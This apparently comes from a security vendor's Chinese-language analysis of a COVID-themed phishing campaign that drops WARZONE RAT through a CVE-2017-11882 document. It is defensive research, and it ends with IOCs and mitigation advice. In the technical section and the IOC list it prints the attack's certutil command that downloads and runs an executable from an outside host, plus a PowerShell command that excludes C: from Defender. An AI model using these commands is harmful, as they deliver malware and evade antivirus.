概述
近日,綠盟科技伏影實驗室再次發現一起黑客利用新冠疫情實施釣魚郵件攻擊的案例,此次案例的攻擊目標為一家位於中國臺灣的POS解決方案提供商。
黑客偽造成美國疾病預防與控制中心發送郵件,實則是通過AOL郵箱發送釣魚郵件。早在2011年,AOL郵箱就有被報道發送釣魚郵件的事件。2014年,郵件服務器被黑客攻擊,用來發送釣魚郵件和傳播釣魚網站,後又被勒索軟件使用作為聯繫郵箱。
此次釣魚郵件內容和附件名稱也與疫情相關,通過郵件內容誘導用戶打開並查看附件文檔《COVID-19 - nCoV - Special Update.doc》。打開的文檔沒有任何內容顯示,看似無害,但是實際上包含了CVE-2017-11882的漏洞利用。當收件人打開文檔,便會觸發漏洞利用。一旦漏洞成功利用,便會下載並啟動第一階段攻擊載荷,通過多次資源文件解密之後執行最終的商業化遠控木馬WARZONE RAT。
WARZONE RAT是一款功能完善的商業化遠控木馬軟件,有多次進行攻擊活動的記錄。相關信息顯示,WARZONE RAT相關的廣告信息最早於2018年出現在 warzone[.]io,目前仍在warzone[.]pw網站提供銷售服務。Warzone RAT木馬具備比較完整的遠控功能,在後面技術分析部分會進行介紹。WARZONE RAT因為木馬文件中存在字符串AVE_MARIA,又被安全廠商識別為Ave Maria。
2018年12月底,Ave Maria惡意軟件對意大利某能源企業發起網絡釣魚攻擊。黑客以供應商銷售部的名義發出釣魚郵件,附帶了包含CVE-2017-11882漏洞利用的Excel文件,以運行從惡意網站下載的木馬程序。
2019年2月,WARZONE RAT又發生一起疑似針對西班牙語地區的政府機構及能源企業等部門的定向攻擊活動。黑客以應聘者的身份發送誘餌文檔,文檔以簡歷更新的標題為誘餌,對目標人力資源部門進行定向攻擊,誘使相關人員執行惡意代碼,從而控制目標人員機器,從事間諜活動。
2019年11月,研究人員發現思科重定向漏洞被利用,攻擊者使用開放重定向漏洞,使得合法站點允許未經授權的用戶在該站點上創建URL地址,從而使訪問者通過該站點重定向到另外一個站點。黑客將垃圾郵件偽裝成WebEx的會議邀請郵件,將其中鏈接重定向到WARZONE RAT木馬下載鏈接。一旦運行該木馬,受害者的PC將被黑客完全控制。
攻擊流程
本次事件目標郵箱地址在目標企業官網的contact us部分可以找到,黑客可能是通過訪問企業官網確定目標的郵箱地址電話號碼等信息。然後偽造發件人向目標郵箱發送釣魚郵件,誘導收件人查看郵件中帶有漏洞利用的郵件附件文檔,一旦漏洞成功利用,黑客最終將控制目標PC。
當收件人打開郵件附件文檔的時候,會觸發漏洞利用下載第一階段攻擊載荷,然後通過多次解密後獲得並執行第二階段第三階段攻擊載荷,第三階段攻擊載荷便是WARZONE RAT,最終連接C&C服務端等待指令。
技術分析
DOC文檔漏洞利用
郵件附件惡意樣本文檔被命名為《COVID-19 - nCoV - Special Update.doc》,利用漏洞CVE-2017-11882執行shellcode:
shellcode通過WinExec執行命令"CmD /C cErTuTiL -uRlCAchE -sPlIT –f http://getegroup.com/file.exe %TMP%\\\\1.exe&start %TMP%\\\\1.exe"。
使用CertUtil.exe下載並啟動第一階段攻擊載荷1.exe。CertUtil.exe是Windows的內置程序,用於在Windows中管理證書,使用該程序可以在Windows中安裝,備份,刪除,管理和執行與證書和證書存儲相關的各種功能。另外,CertUtil能夠從遠程URL下載證書或任何其他文件。
第一階段攻擊載荷
第一階段攻擊載荷是一個C#編寫的程序,代碼經過高度混淆。運行過程中通過解密資源文件CK,在內存裡面獲得第二階段攻擊載荷DEBFyo.dll,通過Assembly.load 加載第二階段攻擊載荷並調用X()方法。
Re.RA.m('ÿ',1,null,510733617)=“X”
第二階段攻擊載荷
第二階段攻擊載荷DEBFyo.dll同樣是一個C#編寫並經過高度混淆的PE文件,文件包含三個資源文件。第二階段攻擊載荷的功能主要是分別解密這三個資源文件生成第三階段攻擊載荷,並按照執行流程進行調用。
第三階段攻擊載荷
第三階段攻擊載荷的三個PE文件:
按照執行流程第一個LOL.dll功能主要是通過查詢WMI數據,檢查系統版本和AV產品,並在啟動目錄下創建指向第一階段攻擊載荷的快捷方式Adobe_Process.exe.lnk
其餘兩個文件一個就是最終的木馬程序WARZONE RAT,另外一個26.dll在功能上更像是一個加載模塊,負責加載執行木馬程序。
第二階段攻擊載荷在啟動加載模塊的時候,會將木馬程序的二進制內存數據作為參數傳入。加載模塊在執行過程中,首先會對當前系統環境中的AV產品和操作系統進行檢查。
· Directory.Exists
C:\\Program Files\\AVAST Software
C:\\Program Files (x86)\\AVAST Software
· Process.GetProcessesByName
BullGuard, a2guard,drweb,vsserv,AVGUI,bdagent,odscanui,bdredline
· detectwd
SELECT Caption FROM Win32_OperatingSystem
檢查過後,便是比較重要的部分,加載模塊會以掛起狀態啟動第一階段攻擊載荷,生成一個新進程。然後將WARZONE RAT木馬按照內存對齊寫入到這個新進程0x400000開始的地址空間,實現了木馬程序進程映像文件的加載,然後通過SetThreadContext和ResumeThread執行WARZONE RAT木馬。
通過SetThreadContext設置指令地址 :
WARZONE RAT
WARZONE RAT是一款通過C++實現的商業遠控木馬程序,兼容所有的Windows版本,功能非常完善,運行後可以實現對植入機器的完全控制。WARZONE RAT功能主要包括:
· 遠程桌面
· 隱藏的遠程桌面-HRDP
· 特權提升-UAC繞過
· 遠程網絡攝像頭
· 竊取密碼-支持流行的瀏覽器和電子郵件客戶端( Chrome, Firefox, Internet Explorer, Edge, Outlook, Thunderbird, Foxmail)
· 文件管理功能-高速的文件上傳下載,支持文件執行和刪除
· 實時和離線的鍵盤記錄
· 反向代理
· 自動任務
· 批量管理
· 智能更新
· Windows Defender繞過
WARZONE RAT銷售網站上,提供了WARZONE RAT的高級版本WARZONE POISON, 在包含了WARZONE RAT的全功能同時,增加了隱藏進程、隱藏文件、隱藏啟動項、瀏覽器和遠程會話劫持等功能。同時,還提供DOC和EXCEL exploit的定製服務。
WARZONE RAT因為木馬文件中存在字符串AVE_MARIA,又被安全廠商識別為Ave Maria。
木馬功能分析
連接C&C,發送並接收數據:
木馬傳輸的數據使用了RC4加密算法加密,密鑰為“warzone160":
下載並執行文件功能:
設置開啟遠程桌面:
特權提升針對不同版本的操作系統使用不同的方法:
1. 通過添加Windows Defender排除項提升權限
2. 通過sdclt.exe提權,當 sdclt.exe 被標準用戶權限的進程調用,它會以更高權限運行另一個進程 sdclt.exe。高權限的 sdclt.exe 進程會調用 C:\\Windows\\System32\\control.exe,而control.exe 進程會以更高權限運行,並嘗試打開 HKCU\\Software\\Classes\\Folder\\shell\\open\\command 註冊表值。
3. 利用 IFileOperation 漏洞利用提權。
首先設置註冊表鍵值為當前程序路徑
加載自身WM_DSP資源模塊,使用pkgmgr.exe進行提權運行註冊表中設置的程序路徑。
竊取密碼
竊取Chrome存儲的用戶信息:
竊取IE存儲的用戶信息:
竊取FireFox用戶信息:
竊取Outlook用戶信息:
竊取ThunderBird用戶信息:
竊取FoxMail信息:
鍵盤記錄
鍵盤記錄鉤子,記錄鍵盤輸入信息:
部分C&C指令表
事件影響及建議
近日發生的攻擊事件表明,黑客不斷利用當前新冠疫情的熱度,進行釣魚郵件攻擊,投放遠控木馬。建議用戶不要被郵件內容誘惑,隨便打開不明來源的郵件附件,另外要更新系統和相關軟件,及時安裝漏洞補丁。另外企業IT部門可以針對不明來源的可疑郵件進行過濾和攔截,保護企業內部安全。
IOCs
URL
http[:]//getegroup.com/file.exe
C&C
phantom101.duckdns.org:5200
45.147.231.168
hash:
b720c71bfd199d956e21d8366fcda5dda66a8b085806329e67955925b16a361c
cd25cea911bae68cf7672539cf6d2748753719bd7494bc9330171d83e4330d03
d340edceb10f4986da886264470c85e7e17dc74a76eb7d100c22b9527e32f1a3
cmd
powershell Add-MpPreference -ExclusionPath C: \\
CmD /C cErTuTiL -uRlCAchE -sPlIT -f hxxp://getegroup.com/file.exe %TMP%\\\\1.exe&start %TMP%\\\\1.exe
strings
warzone160
SELECT * FROM logins
reg
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
· MaxConnectionsPer1_0Serve
· MaxConnectionsPerServer
HKCU\\Software\\_rptls
·Install
HKLM\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Spec
閱讀更多 綠盟科技 的文章
